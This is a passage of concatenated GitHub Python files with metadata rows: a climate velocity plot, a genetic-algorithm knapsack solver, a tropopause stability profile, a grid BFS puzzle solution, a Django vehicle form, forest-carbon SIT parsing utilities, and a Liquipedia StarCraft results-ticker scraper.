    w = np.fromfile(data_dir + '/bin_data/atm_w_time_{}_iter_n_layer_0.bin'.format(time),'<f8')
    h = np.fromfile(data_dir + '/bin_data/atm_h_time_{}_iter_n_layer_0.bin'.format(time),'<f8')
    # Speed magnitude; zeros replaced by 1 to avoid division by zero below.
    vm = np.sqrt(v**2+w**2)
    vm[vm==0] = 1
    v = v/vm
    w = w/vm
    # 1-degree global lat/lon grid (361 x 181 nodes).
    x = np.linspace(-180, 180, 361)
    y = np.linspace(-90, 90, 181)
    xv, yv = np.meshgrid(x, y)
    #print xv
    #print yv
    figure = plt.figure(figsize=(15, 8))
    m = Basemap(llcrnrlon=-180,llcrnrlat=-90,urcrnrlon=180,urcrnrlat=90,projection='cyl', lon_0=0)
    xi, yi = m(xv.flatten(), yv.flatten())
    xi = xi.reshape((181,361))
    yi = yi.reshape((181,361))
    vm = vm.reshape((181,361))
    w = w.reshape((181,361))
    v = v.reshape((181,361))
    h = h.reshape((181,361))
    # Thin the arrow field: keep every 4th point in each direction.
    wn = down_sample(w)
    vn = down_sample(-v)
    # NOTE(review): the second line below uses the *already renormalised* wn,
    # so vn is not divided by the original vector magnitude.  This looks
    # unintentional (asymmetric arrow components) -- confirm before changing,
    # since fixing it would alter all rendered arrow shapes.
    wn = wn / np.sqrt(np.square(wn) + np.square(vn))
    vn = vn / np.sqrt(np.square(wn) + np.square(vn))
    # Arrows coloured by the (downsampled) speed magnitude, capped at 1.2 m/s.
    cs = m.quiver(down_sample(xi), down_sample(yi), wn, vn, down_sample(vm), width=0.001,
                headlength=7, headwidth=5, pivot='tail', clim=[0, 1.2], cmap='jet')
    m.contour( xi, yi, h, colors ='k', linewidths= 0.3 )
    m.drawparallels(np.arange(-90., 90., 10.), labels=[1,0,0,0], fontsize=10)
    m.drawmeridians(np.arange(-180., 180., 45.), labels=[0,0,0,1], fontsize=10)
    cbar = m.colorbar(cs, location='bottom', pad="10%", label='Velocity (m/s)')
    plt.title("Atmospheric Velocity at {0}Ma".format(time))
    plt.savefig(output_dir + '/{}Ma_velocity.png'.format(time), bbox_inches='tight')
    plt.close()
if __name__ == "__main__":
    # Example invocations against the benchmark output data set.
    draw_velocity(0, '../benchmark/output/atm_maps/velocity/', '../benchmark/output/')
    draw_velocity(5, '../benchmark/output/atm_maps/velocity/', '../benchmark/output/')
| atom-model/ATOM | utils/draw_atm_velocities.py | draw_atm_velocities.py | py | 2,177 | python | en | code | 13 | github-code | 1 | [
{
"api_name": "matplotlib.use",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "numpy.fromfile",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "numpy.fromfile",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "numpy.fromfile",
"lin... |
2453043535 | from random import random
import matplotlib.pyplot as plt
class AlgoritmoGenetico():
    """Genetic algorithm driver for a knapsack-style selection problem.

    Relies on an `Individuo` class (not defined in this file) that provides
    `avaliacao()`, `crossover()`, `mutacao()` and the attributes
    `nota_avaliacao`, `espaco_usado`, `cromossomo` and `geracao` -- confirm
    its contract before modifying this class.
    """
    def __init__(self, tamanho_populacao):
        # Population size (number of individuals kept per generation).
        self.tamanho_populacao = tamanho_populacao
        self.populacao = []
        self.geracao = 0
        self.melhor_solucao = 0
        # Best fitness recorded after each generation (for plotting).
        self.lista_solucoes = []
    def inicializa_populacao(self, espacos, valores, limite_espacos):
        """Create the initial random population of `Individuo` instances."""
        for i in range(self.tamanho_populacao):
            self.populacao.append(Individuo(espacos, valores, limite_espacos))
        self.melhor_solucao = self.populacao[0]
    def ordena_populacao(self):
        """Sort the population by fitness, best first."""
        self.populacao = sorted(self.populacao,
                                key = lambda populacao: populacao.nota_avaliacao,
                                reverse = True)
    def melhor_individuo(self, individuo):
        """Keep track of the best individual seen across all generations."""
        if individuo.nota_avaliacao > self.melhor_solucao.nota_avaliacao:
            self.melhor_solucao = individuo
    def soma_avaliacoes(self):
        """Return the total fitness of the population (roulette-wheel base)."""
        soma = 0
        for individuo in self.populacao:
            soma += individuo.nota_avaliacao
        return soma
    def seleciona_pai(self, soma_avaliacao):
        """Roulette-wheel selection: return the index of the chosen parent.

        Draws a random point in [0, total fitness) and walks the population
        until the cumulative fitness passes it.
        """
        pai = -1
        valor_sorteado = random() * soma_avaliacao
        soma = 0
        i = 0
        while i < len(self.populacao) and soma < valor_sorteado:
            soma += self.populacao[i].nota_avaliacao
            pai += 1
            i += 1
        return pai
    def visualiza_geracao(self):
        """Print a one-line summary of the current best individual."""
        melhor = self.populacao[0]
        print("G:%s -> Valor: %s Espaço: %s Cromossomo: %s" % (self.populacao[0].geracao,
                                                               melhor.nota_avaliacao,
                                                               melhor.espaco_usado,
                                                               melhor.cromossomo))
    def resolver(self, taxa_mutacao, numero_geracoes, espacos, valores, limite_espacos):
        """Run the full GA loop and return the best chromosome found.

        Each generation: evaluate, sort, then build a new population of the
        same size via roulette-wheel parent selection, crossover and mutation.
        """
        self.inicializa_populacao(espacos, valores, limite_espacos)
        for individuo in self.populacao:
            individuo.avaliacao()
        self.ordena_populacao()
        self.melhor_solucao = self.populacao[0]
        self.lista_solucoes.append(self.melhor_solucao.nota_avaliacao)
        self.visualiza_geracao()
        for geracao in range(numero_geracoes):
            soma_avaliacao = self.soma_avaliacoes()
            nova_populacao = []
            # Two children per iteration, so half as many iterations.
            for individuos_gerados in range(0, self.tamanho_populacao, 2):
                pai1 = self.seleciona_pai(soma_avaliacao)
                pai2 = self.seleciona_pai(soma_avaliacao)
                filhos = self.populacao[pai1].crossover(self.populacao[pai2])
                nova_populacao.append(filhos[0].mutacao(taxa_mutacao))
                nova_populacao.append(filhos[1].mutacao(taxa_mutacao))
            self.populacao = list(nova_populacao)
            for individuo in self.populacao:
                individuo.avaliacao()
            self.ordena_populacao()
            self.visualiza_geracao()
            melhor = self.populacao[0]
            self.lista_solucoes.append(melhor.nota_avaliacao)
            self.melhor_individuo(melhor)
        print("\nMelhor solução -> G: %s Valor: %s Espaço: %s Cromossomo: %s" %
              (self.melhor_solucao.geracao,
               self.melhor_solucao.nota_avaliacao,
               self.melhor_solucao.espaco_usado,
               self.melhor_solucao.cromossomo))
        return self.melhor_solucao.cromossomo
if __name__ == '__main__':
    # GA hyper-parameters for the demo run.
    limite = 3
    tamanho_populacao = 20
    taxa_mutacao = 0.01
    numero_geracoes = 100
    ag = AlgoritmoGenetico(tamanho_populacao)
    # NOTE(review): `espacos`, `valores` and `lista_produtos` are not defined
    # anywhere in this file as shown -- this block raises NameError unless
    # they are provided elsewhere; confirm the missing setup code.
    resultado = ag.resolver(taxa_mutacao, numero_geracoes, espacos, valores, limite)
    # Print the products selected by the best chromosome ('1' = included).
    for i in range(len(lista_produtos)):
        if resultado[i] == '1':
            print("Nome: %s R$ %s " % (lista_produtos[i].nome,
                                       lista_produtos[i].valor))
    #for valor in ag.lista_solucoes:
    #    print(valor)
    # Plot best-fitness progression over the generations.
    plt.plot(ag.lista_solucoes)
    plt.title("Acompanhamento dos valores")
    plt.show()
| josuelaiber/Civil_Final_Project | curso/Algoritmos Genéticos em Python/13.py | 13.py | py | 4,418 | python | pt | code | 0 | github-code | 1 | [
{
"api_name": "random.random",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.plot",
"line_number": 116,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 116,
"usage_type": "name"
},
{
"api_name": "matplotlib.p... |
38639273059 | import numpy as np
import matplotlib.pyplot as plt
import iris.plot as iplt
from irise import convert, diagnostics, variable
from myscripts.models.um import case_studies
import tropopause
# PV threshold defining the dynamical tropopause (in PVU, presumably --
# confirm units; it is only displayed in the plot title below).
pvtrop = 3.5
# NOTE(review): pvname appears unused in this module.
pvname = 'ertel_potential_vorticity'
# Sampling heights relative to the tropopause (metres), -2 km to +2 km.
dz = np.linspace(-2000, 2000, 21)
def main(cubes):
    """Plot vertical profiles of static stability (N^2) relative to the
    tropopause, computed separately for ridge and trough regions.
    """
    # Calculate N^2
    theta = convert.calc('air_potential_temperature', cubes)
    nsq = variable.N_sq(theta)
    # Find the tropopause
    ztrop, fold_t, fold_b = tropopause.height(cubes)
    # Mask ridges and troughs
    ridges, troughs = tropopause.ridges_troughs(cubes)
    # Create profile of N_sq vs tropopause
    # NOTE(review): the 'troughs' profile is built with the ridges mask and
    # vice versa -- presumably the mask excludes the opposite regime; confirm
    # the mask semantics of diagnostics.profile before relying on this.
    for name, mask in [('troughs', ridges), ('ridges', troughs)]:
        cube = diagnostics.profile(nsq, ztrop, dz, mask=mask)[0]
        iplt.plot(cube, cube.coords()[0], label=name)
    plt.axhline(color='k')
    plt.xlabel(r'$N^2$ $s^{-1}$')
    plt.ylabel('Distance from the tropopause')
    plt.legend(loc='best')
    plt.title('Tropopause PV = %.1f' % pvtrop)
    plt.show()
if __name__ == '__main__':
    # Run the IOP8 case study at a 24-hour lead time.
    forecast = case_studies.iop8.copy()
    cubes = forecast.set_lead_time(hours=24)
    main(cubes)
| leosaffin/scripts | myscripts/tropopause/inversion_layer.py | inversion_layer.py | py | 1,141 | python | en | code | 2 | github-code | 1 | [
{
"api_name": "numpy.linspace",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "irise.convert.calc",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "irise.convert",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "irise.variable.N_sq",... |
33931275405 | # https://www.acmicpc.net/problem/7576
# 토마토
from collections import deque
M, N = map(int, input().split())  # M = number of columns, N = number of rows
# Read the grid row by row; 1 cells seed the BFS below, 0 cells get filled.
board = []
for _ in range(N):
    board.append(list(map(int, input().split())))
def bfs():
    """Multi-source BFS over the global board.

    Every cell equal to 1 is a starting source; each BFS step writes
    parent_value + 1 into adjacent 0 cells.  Returns the number of steps
    needed to fill every 0 cell, or -1 if some 0 cell is unreachable.
    """
    global M, N, board
    # Seed the frontier with every source cell at once.
    frontier = deque(
        (row, col)
        for row in range(N)
        for col in range(M)
        if board[row][col] == 1
    )
    offsets = ((1, 0), (-1, 0), (0, -1), (0, 1))
    while frontier:
        row, col = frontier.popleft()
        for d_row, d_col in offsets:
            adj_row, adj_col = row + d_row, col + d_col
            if not (0 <= adj_row < N and 0 <= adj_col < M):
                continue
            if board[adj_row][adj_col] == 0:
                board[adj_row][adj_col] = board[row][col] + 1
                frontier.append((adj_row, adj_col))
    # A remaining 0 means an unreachable cell; otherwise the answer is the
    # largest recorded value minus the initial 1.
    best = 0
    for board_row in board:
        for cell in board_row:
            if cell == 0:
                return -1
            if cell > best:
                best = cell
    return best - 1
print(bfs())  # minimum number of steps, or -1 if some cell can never be reached
| progjs/coding_test | 백준/7576.py | 7576.py | py | 960 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "collections.deque",
"line_number": 13,
"usage_type": "call"
}
] |
14285320497 | """ Forms Motors. """
from datetime import date
from django import forms
class MotorForm(forms.Form):
    """Offer form for motor-vehicle listings.

    NOTE(review): the original (Spanish) docstring said "mobliliarios"
    (furniture), which looks like a copy-paste slip -- the fields below are
    clearly vehicle-specific.  User-facing labels remain in Spanish.
    """
    FUEL_CHOICES = [
        ('Nafta', 'Nafta'),
        ('Diesel', 'Diesel'),
        ('Alcohol', 'Alcohol'),
        ('Flex', 'Flex'),
        ('Eléctrico', 'Eléctrico'),
    ]
    TRANSMISSION_CHOICES = [
        ('manual', 'Manual'),
        ('automatic', 'Automática'),
    ]
    # NOTE(review): evaluated once at import time -- the process must be
    # restarted after a year change for the new year to appear.
    YEAR_CHOICES = [(year, year)
                    for year in range(1886, date.today().year + 1)]
    # Vehicle-specific fields
    brand = forms.CharField(
        widget=forms.TextInput(attrs={'class': 'form-control'}),
        label='Marca',
        max_length=255,
        min_length=1,
        required=True,
    )
    model = forms.CharField(
        widget=forms.TextInput(attrs={'class': 'form-control'}),
        label='Modelo',
        max_length=255,
        min_length=1,
        required=True,
    )
    fuel = forms.ChoiceField(
        widget=forms.Select(attrs={'class': 'form-control'}),
        label='Combustible',
        choices=FUEL_CHOICES,
        required=True,
    )
    transmission = forms.ChoiceField(
        widget=forms.Select(attrs={'class': 'form-control'}),
        label='Transmisión',
        choices=TRANSMISSION_CHOICES,
        required=True,
    )
    year = forms.ChoiceField(
        widget=forms.Select(attrs={'class': 'form-control'}),
        label='Año',
        required=True,
        choices=YEAR_CHOICES,
        initial=date.today().year,
    )
    color = forms.CharField(
        widget=forms.TextInput(attrs={'class': 'form-control'}),
        label='Color',
        max_length=255,
        min_length=4,
        required=True,
    )
    # Fields shared with the common listing form
    title = forms.CharField(
        widget=forms.TextInput(attrs={'class': 'form-control'}),
        label='Título',
        max_length=255,
        min_length=1,
        required=True,
    )
    description = forms.CharField(
        widget=forms.Textarea(attrs={'class': 'form-control'}),
        label='Descripción',
        max_length=255,
        min_length=1,
        required=True,
    )
    location = forms.CharField(
        widget=forms.TextInput(attrs={'class': 'form-control'}),
        label='Ubicación',
        max_length=255,
        min_length=4,
        required=True,
    )
    price = forms.IntegerField(
        widget=forms.TextInput(attrs={'class': 'form-control'}),
        label='Precio',
        min_value=1,
        required=True,
        error_messages={
            'invalid': 'Por favor, ingrese un número válido para el precio.',
        }
    )
    phone1 = forms.CharField(
        widget=forms.TextInput(attrs={'class': 'form-control'}),
        label='Celular 1',
        min_length=8,
        required=True,
        error_messages={
            'invalid': 'Por favor, ingrese un número de contacto válido',
        }
    )
    phone2 = forms.CharField(
        widget=forms.TextInput(attrs={'class': 'form-control'}),
        label='Celular 2',
        min_length=8,
        required=False
    )
    email = forms.EmailField(
        widget=forms.TextInput(attrs={'class': 'form-control'}),
        label='Email',
        error_messages={
            'invalid': 'Por favor, ingrese un email válido.',
        }
    )
    images = forms.ImageField(
        widget=forms.FileInput(attrs={'class': 'form-control'}),
        label='Imagen',
        required=False,
    )
| Seph1986/202306_nemu_market | apps/motor_app/forms.py | forms.py | py | 3,469 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "django.forms.Form",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "django.forms",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "datetime.date.today",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "datetime.date",... |
28987569197 | # This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at https://mozilla.org/MPL/2.0/.
from __future__ import annotations
import pandas as pd
import numpy as np
from typing import Iterable, Callable, Any
def unpack_column(
    table: pd.DataFrame, column_description: dict, table_name: str
) -> pd.DataFrame:
    """Extract and validate one column from a column-ordered table.

    The column is located by ``column_description["index"]``.  If a ``type``
    key is present, values are converted to that type (NaN entries are left
    in place); ``min_value``/``max_value`` are then enforced as inclusive
    bounds.  ``table_name`` and ``column_description["name"]`` appear only
    in error messages.

    Raises:
        ValueError: on a failed type conversion, a bound given without a
            type, or a violated bound.

    Returns:
        pandas.Series: the validated column values.
    """
    col_name = column_description["name"]
    data = table.iloc[:, column_description["index"]].copy()
    has_type = "type" in column_description
    if has_type:
        if data.isna().any():
            # Convert only the non-null entries so NaN placeholders survive
            # (the column stays dtype=object in this case).
            try:
                data = data.astype("object")
                not_null = data.notna()
                data.loc[not_null] = data.loc[not_null].astype(
                    column_description["type"]
                )
            except ValueError:
                raise ValueError(
                    f"{table_name} table, column: '{col_name}' contains "
                    "values that cannot be converted to: "
                    f"'{column_description['type']}'"
                )
        else:
            data = data.astype(column_description["type"])
    if "min_value" in column_description:
        if not has_type:
            raise ValueError("type required with min_value")
        min_value = column_description["min_value"]
        if len(data[data < min_value]):
            raise ValueError(
                f"{table_name} table, column: '{col_name}' contains values "
                f"less than the minimum allowed value: {min_value}"
            )
    if "max_value" in column_description:
        if not has_type:
            raise ValueError("type required with max_value")
        max_value = column_description["max_value"]
        if len(data[data > max_value]):
            raise ValueError(
                f"{table_name} table, column: '{col_name}' contains values "
                f"greater than the maximum allowed value: {max_value}"
            )
    return data
def _list_duplicates(seq: Iterable) -> list:
    """
    get the list of duplicate values in the specified sequence

    Args:
        seq (iterable): a sequence of comparable (hashable) values

    Returns:
        list: the values that appear at least 2 times in the input
            (order unspecified)
    """
    first_seen = set()
    repeated = set()
    for item in seq:
        if item in first_seen:
            repeated.add(item)
        else:
            first_seen.add(item)
    return list(repeated)
def unpack_table(
    table: pd.DataFrame, column_descriptions: list[dict], table_name: str
) -> pd.DataFrame:
    """Validate and label a column-ordered table.

    Each entry of ``column_descriptions`` is validated via
    :py:func:`unpack_column`; any column labels already on ``table`` are
    ignored and replaced by the described names.

    Raises:
        ValueError: a duplicate column name was detected (e.g. a classifier
            named like another column).

    Returns:
        pandas.DataFrame: a type-validated table with the described columns.
    """
    col_names = [description["name"] for description in column_descriptions]
    repeated_names = _list_duplicates(col_names)
    if repeated_names:
        raise ValueError(f"duplicate column names detected: {repeated_names}")
    unpacked = {
        description["name"]: unpack_column(table, description, table_name)
        for description in column_descriptions
    }
    return pd.DataFrame(columns=col_names, data=unpacked)
def _try_get_int(s):
    """
    Checks if the specified value is an integer, and returns a result

    Args:
        s (any): a value to test

    Returns:
        tuple: (int(s), True) if the value can be converted to an integer,
            and otherwise (None, False)
    """
    # Fixed: the return annotation previously claimed `-> int` although a
    # tuple is returned.
    try:
        return int(s), True
    except (TypeError, ValueError):
        # TypeError covers non-numeric, non-string inputs (e.g. None) so the
        # helper is total over arbitrary values, as its docstring promises;
        # the original caught only ValueError and crashed on such inputs.
        return None, False
def get_parse_bool_func(
    table_name: str, colname: str
) -> Callable[[Any], bool]:
    """Build a parser mapping SIT boolean-like values onto real booleans.

    ``table_name`` and ``colname`` are embedded only in the error message
    raised when a value cannot be interpreted.

    Returns:
        func: a boolean-like value to bool parse function
    """
    def parse_bool(x: Any) -> bool:
        """Convert *x* to bool per the SIT convention.

        Booleans pass through; integers (and numeric strings) are True iff
        positive; 'true'/'t'/'y' and 'false'/'f'/'n' (any case) map to
        True/False; anything else raises ValueError.
        """
        if isinstance(x, bool):
            return x
        if isinstance(x, int):
            # the sit format treats negatives as False for boolean fields
            return x > 0
        lowered = str(x).lower()
        try:
            # Numeric strings follow the same positive-means-True rule.
            return int(lowered) > 0
        except ValueError:
            pass
        if lowered in ("true", "t", "y"):
            return True
        if lowered in ("false", "f", "n"):
            return False
        raise ValueError(
            f"{table_name}: cannot parse value: '{x}' in "
            f"column: '{colname}' as a boolean"
        )
    return parse_bool
def substitute_using_age_class_rows(
    rows: pd.DataFrame,
    parse_bool_func: Callable[[Any], bool],
    age_classes: pd.DataFrame,
) -> pd.DataFrame:
    """Substitute age class criteria values that appear in SIT transition
    rules or disturbance events data into age values.

    Checks that min softwood age equals min hardwood age and max softwood
    age equals max hardwood age since CBM does not carry separate HW/SW ages.

    Args:
        rows (pandas.DataFrame): sit data containing columns that describe age
            eligibility:

            - using_age_class
            - min_softwood_age
            - min_hardwood_age
            - max_softwood_age
            - max_hardwood_age

            Note: the using_age_class column of this frame is modified in
            place (mapped to bool).
        parse_bool_func (func): a function that maps boolean-like values to
            boolean. Passed to the pandas.Series.map function for the
            using_age_class column.
        age_classes (pandas.DataFrame): table of SIT age classes with
            columns: name, start_year, end_year.

    Raises:
        ValueError: values found in the age eligibility columns are not
            defined identifiers in the specified age classes table.
        ValueError: hardwood and softwood age criteria were not identical.

    Returns:
        pandas.DataFrame: the input table with age values criteria substituted
            for age class criteria.
    """
    age_criteria_cols = [
        "min_softwood_age",
        "min_hardwood_age",
        "max_softwood_age",
        "max_hardwood_age",
    ]
    rows.using_age_class = rows.using_age_class.map(parse_bool_func)
    non_using_age_class_rows = rows.loc[~rows.using_age_class]
    using_age_class_rows = rows.loc[rows.using_age_class].copy()

    # "-1" is the SIT sentinel for "no age criterion" and is valid in
    # addition to the defined age class identifiers; this set is
    # loop-invariant so build it once.
    valid_age_classes = np.concatenate(
        [age_classes.name.unique(), np.array(["-1"])]
    )
    for age_class_criteria_col in age_criteria_cols:
        age_class_ids = (
            using_age_class_rows[age_class_criteria_col].astype(str).unique()
        )
        undefined_age_classes = np.setdiff1d(age_class_ids, valid_age_classes)
        if len(undefined_age_classes) > 0:
            raise ValueError(
                f"In column {age_class_criteria_col}, the following age class "
                f"identifiers: {undefined_age_classes} are not defined in SIT "
                "age classes."
            )

    age_class_start_year_map = {
        x.name: int(x.start_year) for x in age_classes.itertuples()
    }
    age_class_end_year_map = {
        x.name: int(x.end_year) for x in age_classes.itertuples()
    }
    # min criteria substitute to the age class start year and max criteria
    # to the end year; a failed lookup (the "-1" sentinel) maps to NaN and
    # is restored to -1 by fillna.
    criteria_bound_maps = {
        "min_softwood_age": age_class_start_year_map,
        "min_hardwood_age": age_class_start_year_map,
        "max_softwood_age": age_class_end_year_map,
        "max_hardwood_age": age_class_end_year_map,
    }
    for col, bound_map in criteria_bound_maps.items():
        using_age_class_rows[col] = (
            using_age_class_rows[col].astype(str).map(bound_map).fillna(-1)
        )

    # return the final substituted rows (non-substituted rows first,
    # matching the original ordering)
    result = pd.concat(
        [non_using_age_class_rows, using_age_class_rows]
    ).reset_index(drop=True)
    # convert to float then to int in case the columns are stored as
    # strings in float format (which fails on astype(int))
    for col in age_criteria_cols:
        result[col] = result[col].astype(float).astype(int)

    # check that all age criteria are identical between SW and HW (since CBM
    # has only a stand age); negative values mean "no criterion" and are
    # exempt from the check
    has_null_min_age_criteria = (result.min_softwood_age < 0) | (
        result.min_hardwood_age < 0
    )
    has_null_max_age_criteria = (result.max_softwood_age < 0) | (
        result.max_hardwood_age < 0
    )
    differing_age_criteria = result.loc[
        (
            (result.min_softwood_age != result.min_hardwood_age)
            & ~has_null_min_age_criteria
        )
        | (
            (result.max_softwood_age != result.max_hardwood_age)
            & ~has_null_max_age_criteria
        )
    ]
    if len(differing_age_criteria) > 0:
        raise ValueError(
            "Values of column min_softwood_age must equal values of column "
            "min_hardwood_age, and values of column max_softwood_age must "
            "equal values of column max_hardwood_age since CBM defines only "
            "a stand age and does not track hardwood and softwood age "
            "seperately."
        )
    return result
| cat-cfs/libcbm_py | libcbm/input/sit/sit_parser.py | sit_parser.py | py | 12,741 | python | en | code | 6 | github-code | 1 | [
{
"api_name": "pandas.DataFrame",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "pandas.DataFrame",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_name": "typing.Iterable",
"line_number": 84,
"usage_type": "name"
},
{
"api_name": "pandas.Da... |
15626371570 | import requests
import re
import datetime
from dateutil import parser
import time
from PIL import Image, ImageDraw, ImageFont
import urllib.parse
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
import os
import pickle
import codecs
# Shared HTTP session reused by every ticker builder below.
S = requests.Session()

# Liquipedia StarCraft II MediaWiki API endpoint.
URL = "https://liquipedia.net/starcraft2/api.php"

# Liquipedia's API policy asks for a descriptive User-Agent with contact
# details.  (The original file assigned this constant twice with identical
# values; the duplicate has been removed.)
HEADER = {'User-Agent': 'Live Match Results Ticker (beomulf@gmail.com)'}

# Timezone abbreviations found in wikitext dates, mapped to UTC offsets that
# dateutil's parser understands.
TIMEZONES = {'CEST': '+02:00', 'EDT': '-04:00'}

# Single-letter race codes used by Liquipedia templates.
RACELIBRARY = {'T': 'Terran', 'P': 'Protoss', 'Z': 'Zerg', 'R': 'Random'}
def build_ticker_DH_NA_groups(pageid, prepend=''):
    """Build the scrolling results ticker for a DreamHack NA group stage.

    Fetches the wikitext of section 6 of the given Liquipedia page, splits it
    into {{HiddenSort}} group tables, tallies per-player map/match records,
    writes recent results as ticker text to 'results.txt' and renders one
    standings image per group via generate_group_standings_img.

    Parameters
    ----------
    pageid : int or str
        Liquipedia page id passed to the MediaWiki parse API.
    prepend : str, optional
        Text inserted in front of each group's results in the ticker.
    """
    params = {
        'action': "parse",
        'pageid': pageid,
        'prop': 'wikitext',
        # section 6 — presumably where the group-stage tables sit on DH NA
        # pages; verify if the page layout changes
        'section': 6,
        'format': "json"
    }
    # NOTE(review): stray no-op string statement left from an earlier
    # docstring; the real summary is at the top of the function.
    """ Parse a section of a page, fetch its table data and save it to a CSV file
    """
    res = S.get(url=URL, params=params, headers=HEADER)
    data = res.json()
    wikitext = data['parse']['wikitext']['*']
    lines = wikitext.split('|-')
    matches = {}
    # each {{HiddenSort}} template marks the start of one group's table
    table = lines[0].split('{{HiddenSort')
    del table[0]
    for group in table:
        # split the group into individual match templates (|M1, |M2, ...)
        match_list = re.split('\|M[0-9]|<', group)
        group_name = group[1:8] + ' | '
        del match_list[0]
        # participant names appear as |p1=..., |p2=..., etc.
        player_names = re.split('\|p[0-9]=', group)
        del player_names[0]
        player_names_list = [x.split('|')[0].split('=') for x in player_names[0:8]]
        player_names_list = [x[0] for x in player_names_list]
        results_dict = dict.fromkeys(player_names_list)
        for key in player_names_list:
            results_dict[key] = {'Map Diff': 0, 'Map Wins': 0, 'Map Losses': 0, 'Match Wins': 0, 'Match Losses': 0}
        matches[group_name] = []
        for match in match_list:
            if 'opponent1' in match:
                # bestof=5 marks the playoff bracket section; stop tallying
                if 'bestof=5' in match:
                    break
                subseries = match.split(' ')
                dateinfo = match.split('date=')[1].split('|')[0]
                date = dateinfo.split('{{')
                # strip template cruft from the timezone half of the date
                date = date[0] + re.sub('[a-z |{|}|\/]', '', date[1]).replace('\n', '')
                for zone, offset in TIMEZONES.items():
                    try:
                        date = date.replace(zone, offset)
                    except:
                        # NOTE(review): str.replace never raises, so this
                        # handler is unreachable
                        print('Invalid Timezone')
                date = parser.parse(date)
                currentTime = datetime.datetime.now(datetime.timezone.utc).astimezone()
                timeDiff = abs(currentTime-date)
                # age of the match in whole hours
                timeDiff = timeDiff.days * 24 + timeDiff.seconds // 3600
                # manual_score_flag: no explicit score= field, so count maps
                # from per-map |winner= fields instead
                manual_score_flag = False
                p1_score = 0
                p2_score = 0
                for line in subseries:
                    if 'opponent1' in line:
                        if re.search('\|1=', line):
                            p1 = line.split('|1=')[-1].split('|')[0].replace('}}\n', '')
                        else:
                            p1 = line.split('|')[2].replace('}}\n', '').split('p1=')[0]
                        if 'score' in line:
                            # NOTE(review): this leaves p1_score as a str; the
                            # arithmetic below would then raise TypeError —
                            # presumably these templates normally omit score=
                            # so the int path runs; verify against live data
                            p1_score = line.split('score=')[1].split('}')[0]
                        else:
                            manual_score_flag = True
                    elif 'opponent2' in line:
                        if re.search('\|1=', line):
                            p2 = line.split('|1=')[-1].split('|')[0].replace('}}\n', '')
                        else:
                            p2 = line.split('|')[2].replace('}}\n', '').split('p1=')[0]
                        if 'score' in line:
                            p2_score = line.split('score=')[1].split('}')[0]
                        else:
                            manual_score_flag = True
                    if 'walkover=1' in line:
                        p1_score = 'W'
                        p2_score = 'L'
                    elif 'walkover=2' in line:
                        p1_score = 'L'
                        p2_score = 'W'
                    elif manual_score_flag and 'winner' in line:
                        winner_id = line.split('winner=')[1].split('}')[0].partition('|')
                        winner_id = winner_id[0]
                        if winner_id == '1':
                            p1_score += 1
                        elif winner_id == '2':
                            p2_score += 1
                if p1_score == '':
                    p1_score = '0'
                if p2_score == '':
                    p2_score = '0'
                # late additions (e.g. substitutes) may not appear in the
                # |p1=..|p8= header, so register them on first sight
                if p1 not in results_dict:
                    results_dict[p1] = {'Map Diff': 0, 'Map Wins': 0, 'Map Losses': 0, 'Match Wins': 0,
                                        'Match Losses': 0}
                if p2 not in results_dict:
                    results_dict[p2] = {'Map Diff': 0, 'Map Wins': 0, 'Map Losses': 0, 'Match Wins': 0,
                                        'Match Losses': 0}
                results_dict[p1]['Map Wins'] += p1_score
                results_dict[p2]['Map Wins'] += p2_score
                results_dict[p1]['Map Losses'] += p2_score
                results_dict[p2]['Map Losses'] += p1_score
                results_dict[p1]['Map Diff'] += p1_score - p2_score
                results_dict[p2]['Map Diff'] += p2_score - p1_score
                # a best-of-3 match is decided once either side reaches 2
                if p1_score >= 2 or p2_score >= 2:
                    if p1_score > p2_score:
                        results_dict[p1]['Match Wins'] += 1
                        results_dict[p2]['Match Losses'] += 1
                    if p2_score > p1_score:
                        results_dict[p2]['Match Wins'] += 1
                        results_dict[p1]['Match Losses'] += 1
                # only matches from the last 10 hours go into the ticker
                if timeDiff < 10:
                    if p1 != '':
                        if p1 != 'BYE' and p2 != 'BYE':
                            matches[group_name].append(
                                ' ' + p1 + ' ' + str(p1_score) + '-' + str(p2_score) + ' ' + p2 + ' ')
                        elif p1 == 'BYE':
                            matches[group_name].append(' ' + p2 + ' (Bye) ')
                        elif p2 == 'BYE':
                            matches[group_name].append(' ' + p1 + ' (Bye) ')
                if p1 == '':
                    p1 = 'TBD'
                if p2 == '':
                    p2 = 'TBD'
        generate_group_standings_img(group_name, results_dict)
    matchlist = []
    for key in matches.keys():
        if matches[key] != []:
            if prepend != '':
                matchlist.append(' | ' + prepend + ' | ')
            matchlist.append(key + ''.join(matches[key]))
    matchstr = ''.join(matchlist)
    with open('results.txt', 'w') as output:
        output.write(matchstr)
    print('Populated Results')
    # pause before the caller's next refresh — presumably to stay within
    # Liquipedia's API rate limits; confirm against their API policy
    time.sleep(40)
def build_ticker_ept_cups(pageid, prepend=''):
    """Build the scrolling results ticker for an EPT Cup bracket page.

    Fetches the page's wikitext, walks the single-elimination bracket
    (round headers plus |R<n>M<m> match templates), and writes ticker text
    to 'results.txt'.  On any parse/API failure an empty ticker is written.

    Parameters
    ----------
    pageid : int or str
        Liquipedia page id passed to the MediaWiki parse API.
    prepend : str, optional
        Text inserted in front of the results in the ticker.
    """
    # TODO: Generalize function to all events
    # TODO: convert match_list to dictionary so we can bump less useful results
    # TODO: add gui to plug in pageid
    # TODO: loop every 30s to reduce user overhead
    params = {
        'action': "parse",
        'pageid': pageid,
        'prop': 'wikitext',
